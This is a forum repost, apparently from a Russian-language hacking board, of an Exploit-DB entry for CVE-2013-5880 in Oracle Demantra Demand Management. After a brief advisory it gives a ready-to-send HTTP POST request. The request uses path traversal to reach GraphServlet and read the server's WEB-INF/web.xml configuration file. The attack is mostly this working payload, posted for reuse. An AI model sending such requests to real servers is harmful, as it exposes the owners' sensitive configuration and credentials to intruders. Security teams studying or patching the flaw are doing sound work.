Exploit Oracle Supply Chain Products Suite - Remote Security

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
39018
Проверка EDB
  1. Пройдено
Автор
ORACLE
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2013-5880
Дата публикации
2014-01-14
Oracle Supply Chain Products Suite - Remote Security
Код:
source: https://www.securityfocus.com/bid/64836/info

Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management.

The vulnerability can be exploited over the 'HTTP' protocol. The 'DM Others' sub component is affected.

Attackers can exploit this issue to obtain sensitive information.

This vulnerability affects the following supported versions:
12.2.0, 12.2.1, 12.2.2

POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1
Host: target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml
 
Источник
www.exploit-db.com

Похожие темы